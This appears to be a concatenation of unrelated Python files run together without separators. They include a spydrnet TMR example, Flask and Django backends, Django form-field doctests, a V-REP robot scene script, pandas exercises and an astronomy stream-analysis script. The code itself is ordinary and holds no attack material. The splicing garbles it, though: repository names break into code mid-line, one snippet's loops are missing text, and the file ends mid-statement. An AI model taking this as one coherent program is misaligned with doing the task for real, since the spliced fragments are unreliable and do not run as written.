figure:: ../../figures/toggle_tmr_with_voters.png :width: 600px :align: center Final Design **See the full code below** """ import spydrnet as sdn from spydrnet.uniquify import uniquify from spydrnet_tmr import apply_nmr, insert_organs from spydrnet_tmr.analysis.voter_insertion.find_after_ff_voter_points import ( find_after_ff_voter_points, ) from spydrnet_tmr.transformation.replication.organ import XilinxTMRVoter netlist = sdn.load_example_netlist_by_name("toggle") uniquify(netlist) hinstances_to_replicate = list( netlist.get_hinstances( recursive=True, filter=lambda x: x.item.reference.is_leaf() is True ) ) instances_to_replicate = list(x.item for x in hinstances_to_replicate) hports_to_replicate = list( netlist.get_hports(filter=lambda x: x.item.direction is sdn.IN) ) for x in hports_to_replicate: if "clk" in x.name: hports_to_replicate.remove(x) ports_to_replicate = list(x.item for x in hports_to_replicate) insertion_points = find_after_ff_voter_points( [*hinstances_to_replicate, *hports_to_replicate], {"FDRE", "FDSE", "FDPE", "FDCE"}, ) replicas = apply_nmr( [*instances_to_replicate, *ports_to_replicate], 3, name_suffix="TMR", rename_original=True, ) voters = insert_organs(replicas, insertion_points, XilinxTMRVoter(), "VOTER") netlist.compose("toggle_tmr.edf") __init__.py from es_store import lambda_handler import os import json from functools import partial from typing import Optional import requests from urllib.parse import urljoin from urllib.parse import quote from tenacity import retry from .httpapi import MiraiHttpApi from .session import MiraiSession from .message.chain import MessageChain from .message.messages import Message class MiraiApi(object): def __init__(self, host: str, authKey: str): self.host = host self.authKey = authKey self.llapi = MiraiHttpApi(host) def get_session(self, account: str): return MiraiSession(self.llapi, account, self.authKey) from flask import request from flask_login import current_user from . import v1_api as api from .. 
import db from ..decorators import paginate, sudo_required from ..models import Company from ..utils import send_response, log_activity @api.route('/companies/', methods=['GET']) @paginate('companies') @sudo_required def get_companies(): return Company.query.order_by(Company.id) @api.route('/companies/', methods=['GET']) @sudo_required def get_company(company_id): return Company.query.get_or_404(company_id) @api.route('/companies', methods=['POST']) @sudo_required def create_new_company(): company = Company.import_json(request.json) if company is None: return send_response(404, 'Bad request', 'Unable to get the JSON data needed') db.session.add(company) db.session.commit() return send_response(200, 'Successful', 'Successful') @api.route('/companies/', methods=['DELETE']) @sudo_required def delete_company(company_id): company = Company.query.get(company_id) if not company: return send_response(404, 'Company not found', '') db.session.delete(company) db.session.commit() log_activity('DELETE[delete_company]', current_user.username, company.name, '') return send_response(200, 'Successful', 'OK') import base64 import json import logging import mimetypes import email.encoders as encoder import socket from email.mime.audio import MIMEAudio from email.mime.base import MIMEBase from email.mime.image import MIMEImage from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText from django.conf import settings from google.oauth2 import service_account from googleapiclient.discovery import build from django.core.mail.backends.smtp import EmailBackend logger = logging.getLogger(__name__) class GmailApiBackend(EmailBackend): def __init__( self, fail_silently=False, **kwargs ): super().__init__(fail_silently=fail_silently) self.connection = build('gmail', 'v1', cache_discovery=False, credentials=get_credentials()) def send_messages(self, email_messages): new_conn_created = self.open() if not self.connection or new_conn_created is None: return 0 num_sent = 0 for email_message in email_messages: message = create_message(email_message) sent = self._send(message) if sent: num_sent += 1 if new_conn_created: self.close() return num_sent def _send(self, email_message): try: self.connection.users().messages().send(userId=settings.GMAIL_USER, body=email_message).execute() except Exception as error: logger.error('Error sending email', error) if settings.EMAIL_BACKEND and settings.EMAIL_BACKEND == "mailer.backend.DbBackend": # If using "django-mailer" https://github.com/pinax/django-mailer, tt marks the related message as # deferred only for some exceptions, so we raise one of them to save the error on the db raise socket.error(error) else: raise return True def get_credentials(): credentials = service_account.Credentials.from_service_account_info( json.loads(settings.GOOGLE_SERVICE_ACCOUNT), scopes=settings.GMAIL_SCOPES, subject=settings.GMAIL_USER) return credentials def create_message(email_message): if email_message.attachments: message = MIMEMultipart() msg = MIMEText(email_message.body, email_message.content_subtype) message.attach(msg) else: message = MIMEText(email_message.body, email_message.content_subtype) message['to'] = ','.join(map(str, email_message.to)) message['from'] = email_message.from_email if email_message.reply_to: message['reply-to'] = ','.join(map(str, email_message.reply_to)) if email_message.cc: message['cc'] = ','.join(map(str, email_message.cc)) if email_message.bcc: message['bcc'] = ','.join(map(str, email_message.bcc)) message['subject'] = 
str(email_message.subject) if email_message.attachments: for attachment in email_message.attachments: content_type, encoding = mimetypes.guess_type(attachment[0]) if content_type is None or encoding is not None: content_type = 'application/octet-stream' main_type, sub_type = content_type.split('/', 1) if main_type == 'text': fp = open(attachment[1], 'rb') msg = MIMEText(fp.read(), _subtype=sub_type) fp.close() elif main_type == 'image': fp = open(attachment[1], 'rb') msg = MIMEImage(fp.read(), _subtype=sub_type) fp.close() elif main_type == 'audio': fp = open(attachment[1], 'rb') msg = MIMEAudio(fp.read(), _subtype=sub_type) fp.close() elif type(attachment[1]) is bytes: msg = MIMEBase(main_type, sub_type) msg.set_payload(attachment[1]) else: fp = open(attachment[1], 'rb') msg = MIMEBase(main_type, sub_type) msg.set_payload(fp.read()) fp.close() filename = attachment[0] msg.add_header('Content-Disposition', 'attachment', filename=filename) encoder.encode_base64(msg) message.attach(msg) b64_bytes = base64.urlsafe_b64encode(message.as_bytes()) b64_string = b64_bytes.decode() return {'raw': b64_string} # -*- coding: utf-8 -*- # Tests for the contrib/localflavor/ RO form fields. tests = r""" >>> from django.contrib.localflavor.ro.forms import * ##ROCIFField ################################################################ f = ROCIFField() f.clean('21694681') u'21694681' f.clean('RO21694681') u'21694681' f.clean('21694680') Traceback (most recent call last): ... ValidationError: [u'Enter a valid CIF'] f.clean('21694680000') Traceback (most recent call last): ... ValidationError: [u'Ensure this value has at most 10 characters (it has 11).'] f.clean('0') Traceback (most recent call last): ... ValidationError: [u'Ensure this value has at least 2 characters (it has 1).'] f.clean(None) Traceback (most recent call last): ... ValidationError: [u'This field is required.'] f.clean('') Traceback (most recent call last): ... ValidationError: [u'This field is required.'] ##ROCNPField ################################################################# f = ROCNPField() f.clean('1981211204489') u'1981211204489' f.clean('1981211204487') Traceback (most recent call last): ... ValidationError: [u'Enter a valid CNP'] f.clean('1981232204489') Traceback (most recent call last): ... ValidationError: [u'Enter a valid CNP'] f.clean('9981211204489') Traceback (most recent call last): ... ValidationError: [u'Enter a valid CNP'] f.clean('9981211209') Traceback (most recent call last): ... ValidationError: [u'Ensure this value has at least 13 characters (it has 10).'] f.clean('19812112044891') Traceback (most recent call last): ... ValidationError: [u'Ensure this value has at most 13 characters (it has 14).'] f.clean('') Traceback (most recent call last): ... ValidationError: [u'This field is required.'] ##ROCountyField ############################################################## f = ROCountyField() f.clean('CJ') 'CJ' f.clean('cj') 'CJ' f.clean('Argeş') 'AG' f.clean('argeş') 'AG' f.clean('Arges') Traceback (most recent call last): ... ValidationError: [u'Enter a Romanian county code or name.'] f.clean('') Traceback (most recent call last): ... 
ValidationError: [u'This field is required.'] ##ROCountySelect ############################################################# f = ROCountySelect() f.render('county','CJ') u'' ##ROIBANField ################################################################# f = ROIBANField() f.clean('RO56RZBR0000060003291177') u'RO56RZBR0000060003291177' f.clean('RO56RZBR0000060003291176') Traceback (most recent call last): ... ValidationError: [u'Enter a valid IBAN in ROXX-XXXX-XXXX-XXXX-XXXX-XXXX format'] f.clean('RO56-RZBR-0000-0600-0329-1177') u'RO56RZBR0000060003291177' f.clean('AT61 1904 3002 3457 3201') Traceback (most recent call last): ... ValidationError: [u'Enter a valid IBAN in ROXX-XXXX-XXXX-XXXX-XXXX-XXXX format'] f.clean('RO56RZBR000006000329117') Traceback (most recent call last): ... ValidationError: [u'Ensure this value has at least 24 characters (it has 23).'] f.clean('') Traceback (most recent call last): ... ValidationError: [u'This field is required.'] ##ROPhoneNumberField ########################################################## f = ROPhoneNumberField() f.clean('0264485936') u'0264485936' f.clean('(0264)-485936') u'0264485936' f.clean('02644859368') Traceback (most recent call last): ... ValidationError: [u'Phone numbers must be in XXXX-XXXXXX format.'] f.clean('026448593') Traceback (most recent call last): ... ValidationError: [u'Ensure this value has at least 10 characters (it has 9).'] f.clean(None) Traceback (most recent call last): ... ValidationError: [u'This field is required.'] ##ROPostalCodeField ########################################################### f = ROPostalCodeField() f.clean('400473') u'400473' f.clean('40047') Traceback (most recent call last): ... ValidationError: [u'Ensure this value has at least 6 characters (it has 5).'] f.clean('4004731') Traceback (most recent call last): ... ValidationError: [u'Ensure this value has at most 6 characters (it has 7).'] f.clean('') Traceback (most recent call last): ... 
ValidationError: [u'This field is required.'] """ 10-100 #!/usr/bin/env python from SceneObjectExtractor import SceneObjectExtractor import time import vrep # Update rate in seconds #rate = 0.1 extractor = SceneObjectExtractor('127.0.0.1', 19997) # List of object names to retrieve information # For now it is hardcoded extractor.set_static_obj_names(['fake_obj', 'stairs', 'slidingDoor', 'DockStationBody', 'DockStationBody#0',\ 'ConveyorBeltBody', 'ConveyorBeltBody#0', 'ConveyorBeltBody#1', 'ShelfBody', 'ShelfBody#0', 'ShelfBody#1']) extractor.set_dynamic_obj_names(['Bill#3', 'product', 'fake_obj']) extractor.set_robot_names(['turtlebot2i', 'turtlebot2i#0']) print('Connected to remote API server') print('Getting scene properties (this can take a while)...') # Get all objects info once (for static properties) and # prepare the callback for the streaming mode extractor.operation_mode = vrep.simx_opmode_streaming extractor.get_all_objects_info() extractor.update_robots_vision_sensor_info() extractor.update_all_robots_vision_sensors_fov() time.sleep(0.3) # streaming takes a while to get ready extractor.operation_mode = vrep.simx_opmode_buffer extractor.get_all_objects_info() extractor.update_robots_vision_sensor_info() extractor.update_all_robots_vision_sensors_fov() print('Finished getting scene properties!\n') print('Started getting scene objects from vision sensor FOV...') while True: # Get dynamic object info (pose and vel) periodically extractor.update_dynamic_obj_info() # Update vision sensor info extractor.update_all_robots_vision_sensors_fov() # Get objects that are in the sensor FOV for robot in extractor.robot_obj_list: obj_list = extractor.get_objects_from_vision_sensor(robot.vision_sensor) if (obj_list != None): # Remove the robot itself from the list obj_list = [i for i in obj_list if i.name!=robot.name] # Print detected objects of the vision sensor print(robot.name, robot.vision_sensor.name, obj_list) #time.sleep(rate) # Close the connection to V-REP vrep.simxFinish(clientID) from .grid import * # Returns true if snake should be passive. 
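# With two or fewer snakes left, go passive only if the single opponent is
# shorter by more than two segments and health exceeds the Manhattan distance
# to the food by more than 2 * board_dim; otherwise require the health margin
# to exceed 6 * board_dim + 1 and the snake to be longer than 4.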
def passive_heuristic(board, health, head, food, board_dim, length, id, num_snakes, snakes): if num_snakes <= 2: for snake in snakes: if snake['id'] != id: return len(snake['body']) + 2 < length and health - board.manhattan_distance(head[0], head[1], food[0], food[1]) > 2*board_dim return False #return health - board.manhattan_distance(head[0], head[1], food[0], food[1]) > 8*board_dim + 1 and length > 4 return health - board.manhattan_distance(head[0], head[1], food[0], food[1]) > 6*board_dim + 1 and length > 4from datetime import datetime from sqlalchemy import Table, Column, Integer, String, ForeignKey, CHAR, Interval from sqlalchemy.dialects.postgresql import TIMESTAMP, JSONB import sqlalchemy as sa METADATA = sa.MetaData() """ CREATE TABLE videos ( id int PRIMARY KEY, title string(40) NOT NULL, owner_id string(5) NOT NULL, date_created date, tags string(30), len interval hour to minute );""" videos = Table( 'videos', METADATA, Column('id', Integer, primary_key=True), Column('title', String(40), nullable=False), Column('owner_id', String(5), nullable=False), Column('date_created', TIMESTAMP), Column('len', Interval), ) def get_video(id, *, session): query = videos.select().where(videos.c.id == id) results = session.execute(query).fetchone() return { 'id': results.id, 'title': results.title, 'owner': results.owner_id, 'date_created': results.date_created, 'length': results.len } def modify_video(id, title, owner_id, *, session): query = videos.update().where(videos.c.id == id) if title: query = query.values(title=title) if owner_id: query = query.values(owner_id=owner_id) session.execute(query) session.commit() def add_video(title, owner_id, length, *, session): query = videos.insert().values( title=title, owner_id=owner_id, len=length, date_created=datetime.now() ) r = session.execute(query) i = r.inserted_primary_key[0] session.commit() print(i) return i """ uncomment below for v 22 """ """ videos = Table( 'videos', METADATA, Column('id', Integer, primary_key=True), Column('title', String(40), nullable=False), Column('title_v2', String(60)), Column('owner_id', String(5), nullable=False), Column('date_created', TIMESTAMP), Column('len', Interval), ) def get_video(id, *, session): query = videos.select().where(videos.c.id == id) results = session.execute(query).fetchone() return { 'id': results.id, 'title': results.title_v2 or results.title, 'owner': results.owner_id, 'date_created': results.date_created, 'length': results.len } def modify_video(id, title, owner_id, *, session): query = videos.update().where(videos.c.id == id) if title: query = query.values(title_v2=title) if owner_id: query = query.values(owner_id=owner_id) session.execute(query) session.commit() def add_video(title, owner_id, length, *, session): query = videos.insert().values( title_v2=title, owner_id=owner_id, len=length, date_created=datetime.now() ) r = session.execute(query) i = r.inserted_primary_key[0] session.commit() return i """ code.py # -------------- #Importing header files import pandas as pd import numpy as np import matplotlib.pyplot as plt #Path of the file path #Code starts here data = pd.read_csv(path) data.rename(columns={'Total':'Total_Medals'}, inplace=True) print(data.head()) # -------------- #Code starts here data['Better_Event'] = np.where(data['Total_Summer'] > data['Total_Winter'], 'Summer', 'Winter') data['Better_Event'] = np.where(data['Total_Summer'] == data['Total_Winter'], 'Both', data['Better_Event']) better_event = data['Better_Event'].value_counts().index.values[0] 
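# value_counts() returns counts sorted in descending order, so the first index
# value is the most frequent Better_Event label across all countries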
#print(data.head(5)) print(better_event) assert data['Better_Event'].value_counts()['Summer'] == 143, "Should be 143" # -------------- #Code starts here top_countries = data[['Country_Name','Total_Summer', 'Total_Winter', 'Total_Medals']] print(top_countries.head(5)) top_countries=top_countries[:-1] def top_ten(data,column): country_list = [] country_list=list((data.nlargest(10,column)['Country_Name'])) return country_list top_10_summer=top_ten(top_countries,'Total_Summer') print("Top 10 Summer:\n",top_10_summer, "\n") top_10_winter=top_ten(top_countries,'Total_Winter') print("Top 10 Winter:\n",top_10_winter, "\n") top_10=top_ten(top_countries,'Total_Medals') print("Top 10 :\n",top_10, "\n") common=list(set(top_10_summer) & set(top_10_winter) & set(top_10)) print(common) # -------------- #Code starts here #Create dataframe anmd plot for Summer Event summer_df = data[data['Country_Name'].isin(top_10_summer)] #print(summer_df) plt.figure(figsize=(20,6)) plt.bar(summer_df['Country_Name'], summer_df['Total_Summer']) plt.title('Top 10 Summer') plt.xlabel('Country Name') plt.ylabel('Total Medals') #Create the dataframe and plot for Winter Event winter_df = data[data['Country_Name'].isin(top_10_winter)] #print(winter_df) plt.figure(figsize=(20,6)) plt.bar(winter_df['Country_Name'], winter_df['Total_Winter']) plt.title('Top 10 Winter') plt.xlabel('Country Name') plt.ylabel('Total Medals') #Create the dataframe and plot for Winter Event top_df = data[data['Country_Name'].isin(top_10)] #print(top_df) plt.figure(figsize=(20,6)) plt.bar(top_df['Country_Name'], top_df['Total_Medals']) plt.title('Top 10') plt.xlabel('Country Name') plt.ylabel('Total Medals') # -------------- summer_df['Golden_Ratio'] = summer_df['Gold_Summer'] / summer_df['Total_Summer'] summer_max_ratio = max(summer_df['Golden_Ratio']) print(summer_df['Golden_Ratio'].idxmax()) summer_country_gold = summer_df.loc[summer_df['Golden_Ratio'].idxmax(),'Country_Name'] print("Top Summer Coutnry: ", summer_country_gold, " with a ratio of %.2f" % summer_max_ratio) # For Winter List winter_df['Golden_Ratio'] = winter_df['Gold_Winter'] / winter_df['Total_Winter'] winter_max_ratio = max(winter_df['Golden_Ratio']) winter_country_gold = winter_df.loc[winter_df['Golden_Ratio'].idxmax(), 'Country_Name'] print("Top Winter Country: ", winter_country_gold, " with a ratio of %.2f" % winter_max_ratio) # For Over List top_df['Golden_Ratio'] = top_df['Gold_Total'] / top_df['Total_Medals'] top_max_ratio = max(top_df['Golden_Ratio']) top_country_gold = top_df.loc[top_df['Golden_Ratio'].idxmax(), 'Country_Name'] print("Top Country: ", top_country_gold, " with a ratio of %.2f" % top_max_ratio) # -------------- #Code starts here data_1 = data[:-1] data_1['Total_Points'] = data_1['Gold_Total'] * 3 + data_1['Silver_Total'] * 2 + data_1['Bronze_Total'] * 1 print(data_1.head(10)) most_points = max(data_1['Total_Points']) best_country = data_1.loc[data_1['Total_Points'].idxmax(),'Country_Name'] print("The maximum points achieved is: ", most_points, " by ", best_country) # -------------- #Code starts here #Subsetting the dataframe best=data[data['Country_Name']==best_country] best.reset_index(drop = True, inplace = True) best=best[['Gold_Total','Silver_Total','Bronze_Total']] #Plotting bar plot best.plot.bar(stacked=True) #Changing the x-axis label plt.xlabel('United States') #Changing the y-axis label plt.ylabel('Medals Tally') #Rotating the ticks of X-axis plt.xticks(rotation=45) #Updating the graph legend l=plt.legend() l.get_texts()[0].set_text('Gold_Total :' + 
str(best['Gold_Total'].values)) l.get_texts()[1].set_text('Silver_Total :' + str(best['Silver_Total'].values)) l.get_texts()[2].set_text('Bronze_Total :' + str(best['Bronze_Total'].values)) #Code ends here crewxart/coj-problems-python0 i=0 u=20 while i<20: phrase= raw_input() phrase=phrase.split() word_1=phrase[0] word_2=phrase[1] tam_1=len(word_1) tam_2=len(word_2) def verificar(tam1, tam2, word_1, word_2): i=0 u=0 result=[] while i=tam2: i=tam1 return result def convert(result): i=0 tam=len(result) string="" while imaxsanttos/Exercicos-Python """ somar todos os numeros compreedido entre 1 e 10 """ soma = 0 for i in range(11): #EM c, seria como : for(i = 1; i<= 11;i++) soma += i print(f"Resultado {soma}") """ TODO: add docstring ------------------------------------------------------------------------------ COPYRIGHT/LICENSE. This file is part of the XYZ package. It is subject to the license terms in the LICENSE file found in the top-level directory of this distribution. No part of the XYZ package, including this file, may be copied, modified, propagated, or distributed except according to the terms contained in the LICENSE file. ------------------------------------------------------------------------------ """ # pylint: disable=invalid-name # --- Imports # Standard library # External packages import numpy # XYZ # TODO from samr.geometry import Geometry # --- Constants # numpy integer data types _NUMPY_INT_DTYPES = [numpy.int_, numpy.intc, numpy.intp, numpy.int8, numpy.int16, numpy.int32, numpy.int64] # --- Class definition class MeshBlock: """ TODO """ # --- Properties @property def num_dimensions(self): """ int: dimensionality of index space """ return self._geometry.num_dimensions @property def lower(self): """ numpy.ndarray: lower corner of index space covered by MeshBlock Notes ----- * lower.dtype = 'int64' """ return self._lower @property def upper(self): """ numpy.ndarray: upper corner of index space covered by MeshBlock Notes ----- * upper.dtype = 'int64' """ return self._upper @property def geometry(self): """ BlockGeometry: geometry of MeshBlock """ return self._geometry @property def data(self): """ dict: mapping from MeshVariables to numpy arrays containing data values """ return self._data # --- Public methods def __init__(self, geometry, lower, upper): """ TODO Parameters ---------- geometry: BlockGeometry geometry of MeshBlock lower: numpy.ndarray of integers lower corner of index space covered by MeshBlock upper: numpy.ndarray of integers upper corner of index space covered by MeshBlock Examples -------- TODO """ # --- Check arguments # geometry if not isinstance(geometry, Geometry): raise ValueError("'geometry' is not Geometry object") # get dimensionality of geometry num_dimensions = geometry.num_dimensions # lower if not isinstance(lower, numpy.ndarray): raise ValueError("'lower' is not a numpy.ndarray") if len(lower) != num_dimensions: err_msg = "'lower' does not have 'num_dimensions' components" raise ValueError(err_msg) if lower.dtype not in _NUMPY_INT_DTYPES: err_msg = "'lower' does not have an integer dtype" raise ValueError(err_msg) # upper if not isinstance(upper, numpy.ndarray): raise ValueError("'upper' is not a numpy.ndarray") if len(upper) != num_dimensions: err_msg = "'upper' does not have 'num_dimensions' components" raise ValueError(err_msg) if upper.dtype not in _NUMPY_INT_DTYPES: err_msg = "'upper' does not have an integer dtype" raise ValueError(err_msg) # --- Set property and attribute values # PYLINT: eliminate 'defined outside __init__' error 
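# (all instance attributes are created here in __init__; 'lower' and 'upper'
# are stored as int64 copies below so the index-space corners have a
# consistent dtype regardless of the integer dtype passed in)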
self._data = {} # index space self._lower = lower.astype('int64') self._upper = upper.astype('int64') # geometry self._geometry = geometry def add_variable(self, mesh_variable): """ TODO """ # Construct data array for variable data = numpy.array(1) # Set data for variable self._data[mesh_variable] = data def get_data(self, mesh_variable): """ TODO """ # --- Check arguments if mesh_variable not in self.data: err_msg = "'mesh_variable' (={}) not defined on MeshBlock". \ format(mesh_variable) raise ValueError(err_msg) # --- Return data return self.data[mesh_variable] illumidesk/teams/roles.py ROLE_ADMIN = 'admin' ROLE_MEMBER = 'member' ROLE_CHOICES = ( # customize roles here (ROLE_ADMIN, 'Administrator'), (ROLE_MEMBER, 'Member'), ) def user_can_access_team(user, team): return user.is_superuser or is_member(user, team) def user_can_administer_team(user, team): return user.is_superuser or is_admin(user, team) def is_member(user, team): return team.members.filter(id=user.id).exists() def is_admin(user, team): from .models import Membership return Membership.objects.filter(team=team, user=user, role=ROLE_ADMIN).exists() recipes/Python/578845_grep_in_Python/recipe-578845.py def grep(*matches): """Returns a generator function that operates on an iterable: filters items in the iterable that match any of the patterns. match: a callable returning a True value if it matches the item >>> import re >>> input = ["alpha\n", "beta\n", "gamma\n", "delta\n"] >>> list(grep(re.compile('b').match)(input)) ['beta\n'] """ def _do_grep_wrapper(*matches): def _do_grep(lines): for line in lines: for match in matches: if match(line): yield line break return _do_grep return _do_grep_wrapper(*matches) """AyudaEnPython: https://www.facebook.com/groups/ayudapython NOTE: La persona que pidio ayuda no dió mas detalles. TODO: add docstring and tests later... 
""" from abc import ABC, abstractmethod from dataclasses import dataclass, field from random import choices from string import digits from typing import Callable, Dict def generar_imei() -> str: tac = "".join(choices(digits, k=6)) fac = "".join(choices(digits, k=2)) serial = "".join(choices(digits, k=6)) spare = "".join(choices(digits, k=1)) return f"{tac}{fac}{serial}{spare}" @dataclass class Procesador: soc: str cores: int frecuencia: float def overclock(self) -> None: self.frecuencia *= 2 @dataclass class Camara: megapixeles: int def capturar_imagen(self) -> None: print("Imagen capturada") def capturar_video(self) -> None: print("Video capturado") @dataclass class Smartphone(ABC): almacenamiento: str memoria: str procesador: Procesador camara: Camara sistema: str = field(init=False) imei: str = field(default_factory=generar_imei) @abstractmethod def telefono(self): return NotImplementedError() class AndroidPhone(Smartphone): def __init__(self, *args, **kwargs) -> None: super().__init__(*args, **kwargs) self.sistema = "Android" def telefono(self, accion) -> Callable: acciones: Dict[str, Callable] = { "colgar": self.colgar, "marcar": self.marcar, "contestar": self.contestar, } return acciones[accion]() def contestar(self) -> None: print("Atendiento llamada entrante...") def colgar(self) -> None: print("Llamada entrante colgada!") def marcar(self) -> None: print(f"Marcando numero...") def tomar_foto(self) -> None: self.camara.capturar_imagen() def grabar_video(self) -> None: self.camara.capturar_video() if __name__ == "__main__": movil = AndroidPhone( "128GB", "8GB", Procesador("Snapdragon 888", 8, 2.84), Camara(16), ) print(movil) print(movil.almacenamiento) movil.telefono("marcar") movil.tomar_foto() kcotar/Aquarius_membershipgalaxia_simmulation_analysis_streams.py0 import imp, os import astropy.units as un import astropy.coordinates as coord import matplotlib.pyplot as plt import numpy as np import ebf from astropy.table import Table, vstack, Column from mpl_toolkits.mplot3d import Axes3D from sklearn.cluster import DBSCAN from sklearn.neighbors import KernelDensity from sklearn.model_selection import GridSearchCV from skimage.feature import peak_local_max from scipy.ndimage import watershed_ift from skimage.morphology import watershed from vector_plane_calculations import * from velocity_transformations import * imp.load_source('helper', '../tSNE_test/helper_functions.py') from helper import move_to_dir # GALAH # simulation_dir = '/home/klemen/GALAH_data/Galaxia_simulation/GALAH/' # simulation_ebf = 'galaxy_galah_complete.ebf' # simulation_ebf = 'galaxy_galah_fields.ebf' # RAVE simulation_dir = '/home/klemen/GALAH_data/Galaxia_simulation/RAVE/' # simulation_ebf = 'galaxy_rave_complete.ebf' simulation_ebf = 'galaxy_rave_fields.ebf' # out fits simulation_fits = simulation_ebf.split('.')[0]+'.fits' output_dir = '' # -------------------------------------------------------- # ---------------- FUNCTIONS ----------------------------- # -------------------------------------------------------- # -------------------------------------------------------- # ---------------- CONSTANTS AND SETTINGS ---------------- # -------------------------------------------------------- xyz_vel_neighbourhood = 10 # radius km/s # -------------------------------------------------------- # ---------------- INPUT DATA HANDLING ------------------- # -------------------------------------------------------- if os.path.isfile(simulation_dir+simulation_fits): # read data from reduced fits file print 'Reading fits file' 
stars_data = Table.read(simulation_dir+simulation_fits) else: # read original ebf file and reduce data get_cols = ['px', 'py', 'pz', # Position (x,y,z) heliocentric in kpc (galactic coordinate system) 'vx', 'vy', 'vz', # Velocity (U,V,W) heliocentric in km/s ??????? (galactic coordinate system) 'glon', 'glat']#, # galacitic longitude and latitude in degrees #'feh', 'teff', 'grav'] # metallicity, effective temperature, surface gravity print 'Reading ebf file' sim_data = ebf.read(simulation_dir+simulation_ebf) print 'Creating fits file' stars_data = Table() for col in get_cols: stars_data[col] = sim_data[col] sim_data = None stars_data.write(simulation_dir+simulation_fits) #ra_coord = coord.Galactic(l=stars_data['glon']*un.deg, b=stars_data['glat']*un.deg).transform_to(coord.ICRS) plt.scatter(stars_data['glon'], stars_data['glat'], s=1, color='black') # plt.scatter(ra_coord.ra.value, ra_coord.dec.value, s=1, color='black') plt.show() plt.close() raise SystemExit # -------------------------------------------------------- # ---------------- Stream search parameters -------------- # -------------------------------------------------------- # stream search criteria rv_step = 10. # km/s, rv in the radiant of the stream ra_step = 20. # deg dec_step = 10. # deg # -------------------------------------------------------- # ---------------- Evaluation of possible streams -------- # -------------------------------------------------------- manual_stream_radiants = [[20,45,140,240,370,125,20,150], [-10,-30,20,10,50,35,-80,-60], [20,15,35,70,45,55,22,10], [None]] # list of ra, dec, rv values manual_stream_radiants = [[90], [0], [45], [None]] # list of ra, dec, rv values # manual_stream_radiants = parse_selected_streams('Streams_investigation_lower-thr_selected') # iterate trough all possible combinations for the initial conditions of the stream (rv, ra, dec) if manual_stream_radiants is not None: ra_combinations = manual_stream_radiants[0] dec_combinations = manual_stream_radiants[1] rv_combinations = manual_stream_radiants[2] else: rv_range = np.arange(30, 31, rv_step) ra_range = np.arange(0, 360, ra_step) dec_range = np.arange(-90, 90, dec_step) # create a grid of all possible combination stream_mesh = np.meshgrid(ra_range, dec_range, rv_range) ra_combinations = stream_mesh[0].flatten() dec_combinations = stream_mesh[1].flatten() rv_combinations = stream_mesh[2].flatten() n_combinations = len(ra_combinations) print 'Total number of stream combinations that will be evaluated: '+str(n_combinations) # # transform galactic uvw coordinates to equatorial xyz coordinates # coords_new = coord.SkyCoord(u=stars_data['px'], v=stars_data['py'], w=stars_data['pz'], unit='kpc', # frame='galactic', representation='cartesian').transform_to(coord.ICRS).cartesian # veloci_new = coord.SkyCoord(u=stars_data['vx'], v=stars_data['vy'], w=stars_data['vz'], unit='km', # frame='galactic', representation='cartesian').transform_to(coord.ICRS).cartesian # # stars_data['px'] = coords_new.x.value # stars_data['py'] = coords_new.y.value # stars_data['pz'] = coords_new.z.value # stars_data['vx'] = veloci_new.x.value # stars_data['vy'] = veloci_new.y.value # stars_data['vz'] = veloci_new.z.value move_to_dir('Streams_investigation_'+simulation_ebf.split('.')[0]) for i_stream in range(n_combinations): ra_stream = ra_combinations[i_stream] dec_stream = dec_combinations[i_stream] rv_stream = rv_combinations[i_stream] suffix = 'stream_ra_{:05.1f}_dec_{:04.1f}_rv_{:05.1f}'.format(ra_stream, dec_stream, rv_stream) print 'Working on ' + suffix 
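# per-radiant processing: convert the ra/dec radiant to galactic l/b (the
# Galaxia positions and velocities are in the galactic frame), build the xyz
# velocity vector of the stream, and keep only simulated stars whose
# (vx, vy, vz) lie within xyz_vel_neighbourhood km/s of it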
# convert radiant coordinate from ra/dec/rv to l/b/rv system as Galaxia coordinates are in Galactic system l_b_stream = coord.ICRS(ra=ra_stream*un.deg, dec=dec_stream*un.deg).transform_to(coord.Galactic) l_stream = l_b_stream.l.value b_stream = l_b_stream.b.value # velocity vector of stream in xyz equatorial coordinate system with Earth in the center of it # xyz_vel_stream = compute_xyz_vel(np.deg2rad(ra_stream), np.deg2rad(dec_stream), rv_stream) xyz_vel_stream = compute_xyz_vel(np.deg2rad(l_stream), np.deg2rad(b_stream), rv_stream) # select objects from simulation with similar velocity components vel_diff = np.sqrt((stars_data['vx'] - xyz_vel_stream[0])**2 + (stars_data['vy'] - xyz_vel_stream[1])**2 + (stars_data['vz'] - xyz_vel_stream[2])**2) idx_close = vel_diff < xyz_vel_neighbourhood print 'Selected objects: '+str(np.sum(idx_close)) stars_data_subset = stars_data[idx_close] xyz_pos_stars = np.vstack((stars_data_subset['px'], stars_data_subset['py'], stars_data_subset['pz'])).T * 1000. # conversion from kpc to pc xyz_vel_stars = np.vstack((stars_data_subset['vx'], stars_data_subset['vy'], stars_data_subset['vz'])).T # plot selection print ' Outputting xyz velocities scatter plot' plot_range = 10 labels = ['X', 'Y', 'Z'] plot_comb = [[0, 1], [2, 1], [0, 2]] plot_pos = [[0, 0], [0, 1], [1, 0]] fig, ax = plt.subplots(2, 2) for i_c in range(len(plot_comb)): fig_pos = (plot_pos[i_c][0], plot_pos[i_c][1]) i_x = plot_comb[i_c][0] i_y = plot_comb[i_c][1] alpha_use = 0.1 ax[fig_pos].scatter(xyz_vel_stream[i_x], xyz_vel_stream[i_y], lw=0, c='black', s=10, marker='*') ax[fig_pos].scatter(xyz_vel_stars[:, i_x], xyz_vel_stars[:, i_y], lw=0, c='blue', s=2, alpha=alpha_use) ax[fig_pos].set(xlabel=labels[i_x], ylabel=labels[i_y], xlim=[xyz_vel_stream[i_x] - plot_range, xyz_vel_stream[i_x] + plot_range], ylim=[xyz_vel_stream[i_y] - plot_range, xyz_vel_stream[i_y] + plot_range]) plt.savefig(suffix+'_1.png', dpi=300) plt.close() # compute intersection between star vectors and plane defined by the stream vector print ' Computing intersections' plane_intersects_3D = stream_plane_vector_intersect(xyz_pos_stars, xyz_vel_stars, xyz_vel_stream) plane_intersects_2D = intersects_to_2dplane(plane_intersects_3D, xyz_vel_stream) print ' Outputting plane intersections plot' plot_lim = (-1000, 1000) # Create a plot fig, ax = plt.subplots(1, 1) ax.scatter(plane_intersects_2D[:, 0], plane_intersects_2D[:, 1], lw=0, c='blue', s=2, alpha=1.) ax.scatter(0, 0, lw=0, c='black', s=10, marker='*') # solar position ax.set(xlabel='X stream plane', ylabel='Y stream plane', xlim=plot_lim, 